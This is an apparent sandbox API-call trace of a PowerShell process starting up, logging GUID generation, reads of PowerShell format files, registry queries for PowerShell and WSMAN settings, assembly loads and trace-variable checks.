	[0593.193] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x46c117e1, Data2=0x84d4, Data3=0x4e67, Data4=([0]=0x9c, [1]=0x69, [2]=0xe2, [3]=0xe4, [4]=0x62, [5]=0xc, [6]=0xcc, [7]=0x42))) returned 0x0
	[0593.193] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xd41b482f, Data2=0x31c6, Data3=0x4deb, Data4=([0]=0x84, [1]=0x3d, [2]=0xf, [3]=0xfb, [4]=0x18, [5]=0xeb, [6]=0xc4, [7]=0x30))) returned 0x0
	[0593.194] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x8142bcce, Data2=0x6a7f, Data3=0x46d8, Data4=([0]=0xab, [1]=0x66, [2]=0x1e, [3]=0x4e, [4]=0xfd, [5]=0xaf, [6]=0x99, [7]=0x6b))) returned 0x0
	[0593.202] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x8769e732, Data2=0x7bd1, Data3=0x4c57, Data4=([0]=0x90, [1]=0xb5, [2]=0xaf, [3]=0xc9, [4]=0x90, [5]=0xf9, [6]=0xce, [7]=0x8b))) returned 0x0
	[0593.203] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x8164367, Data2=0xf926, Data3=0x42e3, Data4=([0]=0x8b, [1]=0x26, [2]=0xa1, [3]=0xb9, [4]=0x13, [5]=0xe4, [6]=0xee, [7]=0x2b))) returned 0x0
	[0593.203] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x27793591, Data2=0xebe5, Data3=0x4ac3, Data4=([0]=0xaf, [1]=0xd3, [2]=0x82, [3]=0x96, [4]=0x4a, [5]=0x8c, [6]=0xeb, [7]=0xd5))) returned 0x0
	[0593.203] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x82a9a4d1, Data2=0xd7c3, Data3=0x473b, Data4=([0]=0xbf, [1]=0xd5, [2]=0x84, [3]=0xc8, [4]=0x5a, [5]=0x73, [6]=0xe7, [7]=0x16))) returned 0x0
	[0593.204] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x915cc25b, Data2=0x59ec, Data3=0x4af0, Data4=([0]=0x88, [1]=0xaf, [2]=0xc9, [3]=0x7, [4]=0x74, [5]=0xa1, [6]=0xe3, [7]=0x3))) returned 0x0
	[0593.211] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xe0e9053c, Data2=0xfdfe, Data3=0x4c61, Data4=([0]=0x85, [1]=0x5b, [2]=0x83, [3]=0x79, [4]=0xd9, [5]=0x82, [6]=0xad, [7]=0xa4))) returned 0x0
	[0593.211] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xc5544519, Data2=0xfd0e, Data3=0x48ef, Data4=([0]=0x8c, [1]=0x84, [2]=0xba, [3]=0x4c, [4]=0x74, [5]=0x71, [6]=0x29, [7]=0x9c))) returned 0x0
	[0593.212] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xc2e90fa3, Data2=0x2089, Data3=0x46c3, Data4=([0]=0x80, [1]=0x85, [2]=0x60, [3]=0x68, [4]=0x74, [5]=0xf0, [6]=0x7b, [7]=0xbf))) returned 0x0
	[0593.212] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xd530e254, Data2=0x2a7d, Data3=0x4bec, Data4=([0]=0xaa, [1]=0x96, [2]=0xd4, [3]=0x1d, [4]=0xf2, [5]=0x35, [6]=0x6f, [7]=0x64))) returned 0x0
	[0594.335] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xa53edfa, Data2=0xb3e0, Data3=0x4f90, Data4=([0]=0xa4, [1]=0xd2, [2]=0x21, [3]=0x4b, [4]=0x88, [5]=0x89, [6]=0x52, [7]=0x59))) returned 0x0
	[0594.336] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xea093eb4, Data2=0x1935, Data3=0x4575, Data4=([0]=0x96, [1]=0x9c, [2]=0x37, [3]=0xe6, [4]=0xcf, [5]=0x2f, [6]=0x4, [7]=0x26))) returned 0x0
	[0594.336] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x11c2b2ae, Data2=0x3c71, Data3=0x4968, Data4=([0]=0xa4, [1]=0xc5, [2]=0xce, [3]=0xcf, [4]=0x6f, [5]=0xaf, [6]=0xec, [7]=0x83))) returned 0x0
	[0594.336] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x8009522, Data2=0x60a, Data3=0x4566, Data4=([0]=0x88, [1]=0x23, [2]=0xe2, [3]=0x9d, [4]=0xf, [5]=0xd2, [6]=0x2f, [7]=0x19))) returned 0x0
	[0594.337] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x4e2f92ac, Data2=0xbcac, Data3=0x4dd4, Data4=([0]=0x9e, [1]=0xe1, [2]=0x87, [3]=0xd, [4]=0x13, [5]=0x67, [6]=0x52, [7]=0xfb))) returned 0x0
	[0594.337] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xc17b32c, Data2=0x36d1, Data3=0x4d97, Data4=([0]=0x9c, [1]=0x4b, [2]=0x7f, [3]=0x1b, [4]=0x7a, [5]=0xf0, [6]=0x84, [7]=0xa4))) returned 0x0
	[0594.338] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xf0265a2f, Data2=0x2636, Data3=0x4044, Data4=([0]=0x98, [1]=0x5a, [2]=0xee, [3]=0x72, [4]=0x5a, [5]=0xda, [6]=0xd3, [7]=0x0))) returned 0x0
	[0594.338] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x47b3be96, Data2=0x8e55, Data3=0x453f, Data4=([0]=0xb3, [1]=0xb8, [2]=0x8e, [3]=0x99, [4]=0xee, [5]=0xc, [6]=0x1b, [7]=0x2))) returned 0x0
	[0594.338] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xb4ccd9bd, Data2=0xe089, Data3=0x46ab, Data4=([0]=0x97, [1]=0x63, [2]=0xc, [3]=0x7d, [4]=0xf5, [5]=0xc9, [6]=0x9b, [7]=0x17))) returned 0x0
	[0594.339] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x7c91cb3a, Data2=0xc4ec, Data3=0x4f49, Data4=([0]=0xa6, [1]=0xca, [2]=0x88, [3]=0xdf, [4]=0xa9, [5]=0x6a, [6]=0x23, [7]=0xa1))) returned 0x0
	[0594.339] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xacbe8171, Data2=0xe476, Data3=0x47bd, Data4=([0]=0x86, [1]=0x14, [2]=0x51, [3]=0xd, [4]=0xc7, [5]=0x96, [6]=0x4c, [7]=0xe3))) returned 0x0
	[0594.340] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0594.341] GetFileType (hFile=0x2e4) returned 0x1
	[0594.341] SetErrorMode (uMode=0x1) returned 0x1
	[0594.341] GetFileType (hFile=0x2e4) returned 0x1
	[0594.341] ReadFile (in: hFile=0x2e4, lpBuffer=0x3628468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3628468*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0594.344] ReadFile (in: hFile=0x2e4, lpBuffer=0x3628468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3628468*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0594.345] ReadFile (in: hFile=0x2e4, lpBuffer=0x3628468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3628468*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0594.345] ReadFile (in: hFile=0x2e4, lpBuffer=0x3628468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3628468*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0594.347] ReadFile (in: hFile=0x2e4, lpBuffer=0x3628468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3628468*, lpNumberOfBytesRead=0xacfd8*=0x8b4, lpOverlapped=0x0) returned 1
	[0594.347] ReadFile (in: hFile=0x2e4, lpBuffer=0x3627884, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3627884*, lpNumberOfBytesRead=0xacfd8*=0x0, lpOverlapped=0x0) returned 1
	[0594.347] ReadFile (in: hFile=0x2e4, lpBuffer=0x3628468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3628468*, lpNumberOfBytesRead=0xacfd8*=0x0, lpOverlapped=0x0) returned 1
	[0594.347] CloseHandle (hObject=0x2e4) returned 1
	[0594.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0594.347] SetErrorMode (uMode=0x1) returned 0x1
	[0594.347] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xacf80 | out: lpFileInformation=0xacf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0594.347] SetErrorMode (uMode=0x1) returned 0x1
	[0594.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0594.348] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad068 | out: phkResult=0xad068*=0x2e4) returned 0x0
	[0594.348] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xacfec, lpData=0x0, lpcbData=0xacfe8*=0x0 | out: lpType=0xacfec*=0x1, lpData=0x0, lpcbData=0xacfe8*=0x56) returned 0x0
	[0594.348] CoTaskMemAlloc (cb=0x5a) returned 0x216490
	[0594.348] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xacfbc, lpData=0x216490, lpcbData=0xacfb8*=0x56 | out: lpType=0xacfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xacfb8*=0x56) returned 0x0
	[0594.348] CoTaskMemFree (pv=0x216490) 
	[0594.348] RegCloseKey (hKey=0x2e4) returned 0x0
	[0594.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0594.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0594.350] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x5738a5a2, Data2=0xfa3e, Data3=0x47bf, Data4=([0]=0x8c, [1]=0x8a, [2]=0xb5, [3]=0xf4, [4]=0x86, [5]=0x80, [6]=0xa2, [7]=0x72))) returned 0x0
	[0594.352] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xa538bb64, Data2=0x15c7, Data3=0x482d, Data4=([0]=0x9b, [1]=0xfb, [2]=0xbf, [3]=0x3a, [4]=0xda, [5]=0xc7, [6]=0x25, [7]=0xc0))) returned 0x0
	[0594.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0594.353] SetErrorMode (uMode=0x1) returned 0x1
	[0594.353] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0594.353] GetFileType (hFile=0x2e4) returned 0x1
	[0594.353] SetErrorMode (uMode=0x1) returned 0x1
	[0594.353] GetFileType (hFile=0x2e4) returned 0x1
	[0594.353] ReadFile (in: hFile=0x2e4, lpBuffer=0x3666250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3666250*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0594.356] ReadFile (in: hFile=0x2e4, lpBuffer=0x3666250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3666250*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0594.357] ReadFile (in: hFile=0x2e4, lpBuffer=0x3666250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3666250*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0594.358] ReadFile (in: hFile=0x2e4, lpBuffer=0x3666250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3666250*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0594.359] ReadFile (in: hFile=0x2e4, lpBuffer=0x3666250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3666250*, lpNumberOfBytesRead=0xacfd8*=0xe98, lpOverlapped=0x0) returned 1
	[0594.359] ReadFile (in: hFile=0x2e4, lpBuffer=0x3665850, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3665850*, lpNumberOfBytesRead=0xacfd8*=0x0, lpOverlapped=0x0) returned 1
	[0594.359] ReadFile (in: hFile=0x2e4, lpBuffer=0x3666250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3666250*, lpNumberOfBytesRead=0xacfd8*=0x0, lpOverlapped=0x0) returned 1
	[0594.359] CloseHandle (hObject=0x2e4) returned 1
	[0594.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0594.360] SetErrorMode (uMode=0x1) returned 0x1
	[0594.360] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xacf80 | out: lpFileInformation=0xacf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0594.360] SetErrorMode (uMode=0x1) returned 0x1
	[0594.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0594.360] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad068 | out: phkResult=0xad068*=0x2e4) returned 0x0
	[0594.360] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xacfec, lpData=0x0, lpcbData=0xacfe8*=0x0 | out: lpType=0xacfec*=0x1, lpData=0x0, lpcbData=0xacfe8*=0x56) returned 0x0
	[0594.361] CoTaskMemAlloc (cb=0x5a) returned 0x216490
	[0594.361] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xacfbc, lpData=0x216490, lpcbData=0xacfb8*=0x56 | out: lpType=0xacfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xacfb8*=0x56) returned 0x0
	[0594.361] CoTaskMemFree (pv=0x216490) 
	[0594.361] RegCloseKey (hKey=0x2e4) returned 0x0
	[0594.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0594.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0594.364] VirtualQuery (in: lpAddress=0xabb00, lpBuffer=0xac9c0, dwLength=0x30 | out: lpBuffer=0xac9c0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0594.365] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x671ca98a, Data2=0x6889, Data3=0x4518, Data4=([0]=0xa5, [1]=0x50, [2]=0x2d, [3]=0x2, [4]=0x6, [5]=0x5, [6]=0xd2, [7]=0xb7))) returned 0x0
	[0594.366] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x2b7d3d62, Data2=0x77c1, Data3=0x4ea9, Data4=([0]=0xa7, [1]=0x15, [2]=0xeb, [3]=0x10, [4]=0x77, [5]=0xbc, [6]=0x98, [7]=0x8f))) returned 0x0
	[0595.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xad030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0595.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xad030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0595.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xad030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0595.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xad030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0596.342] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0596.342] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0596.342] CoTaskMemFree (pv=0x20dda0) 
	[0596.344] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0596.344] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0596.344] CoTaskMemFree (pv=0x20dda0) 
	[0596.345] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0596.345] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0596.346] CoTaskMemFree (pv=0x20dda0) 
	[0596.347] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0596.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0596.347] CoTaskMemFree (pv=0x20dda0) 
	[0596.358] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0596.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0596.358] CoTaskMemFree (pv=0x20dda0) 
	[0596.359] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0596.360] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0597.437] CoTaskMemFree (pv=0x20dda0) 
	[0597.438] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0597.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0597.438] CoTaskMemFree (pv=0x20dda0) 
	[0597.445] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xad278 | out: phkResult=0xad278*=0x2e4) returned 0x0
	[0597.448] RegQueryInfoKeyW (in: hKey=0x2e4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xad17c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad178, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xad17c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad178*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0597.448] CoTaskMemFree (pv=0x0) 
	[0597.449] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0597.449] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x0, lpValueName=0x1a4bb0, lpcchValueName=0xad228, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xad228, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0597.450] CoTaskMemFree (pv=0x1a4bb0) 
	[0597.450] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0597.450] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x1, lpValueName=0x1a4bb0, lpcchValueName=0xad228, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xad228, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0597.450] CoTaskMemFree (pv=0x1a4bb0) 
	[0597.450] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0597.450] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x2, lpValueName=0x1a4bb0, lpcchValueName=0xad228, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xad228, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0597.450] CoTaskMemFree (pv=0x1a4bb0) 
	[0597.451] RegQueryValueExW (in: hKey=0x2e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0xad20c, lpData=0x0, lpcbData=0xad208*=0x0 | out: lpType=0xad20c*=0x1, lpData=0x0, lpcbData=0xad208*=0x8) returned 0x0
	[0597.451] CoTaskMemAlloc (cb=0xc) returned 0x1faa70
	[0597.451] RegQueryValueExW (in: hKey=0x2e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0xad1dc, lpData=0x1faa70, lpcbData=0xad1d8*=0x8 | out: lpType=0xad1dc*=0x1, lpData="2.0", lpcbData=0xad1d8*=0x8) returned 0x0
	[0597.451] CoTaskMemFree (pv=0x1faa70) 
	[0599.830] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1c8 | out: phkResult=0xad1c8*=0x2e4) returned 0x0
	[0599.830] RegQueryInfoKeyW (in: hKey=0x2e4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xad0cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad0c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xad0cc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad0c8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.830] CoTaskMemFree (pv=0x0) 
	[0599.830] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0599.830] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x0, lpValueName=0x1a4bb0, lpcchValueName=0xad178, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xad178, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0599.830] CoTaskMemFree (pv=0x1a4bb0) 
	[0599.830] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
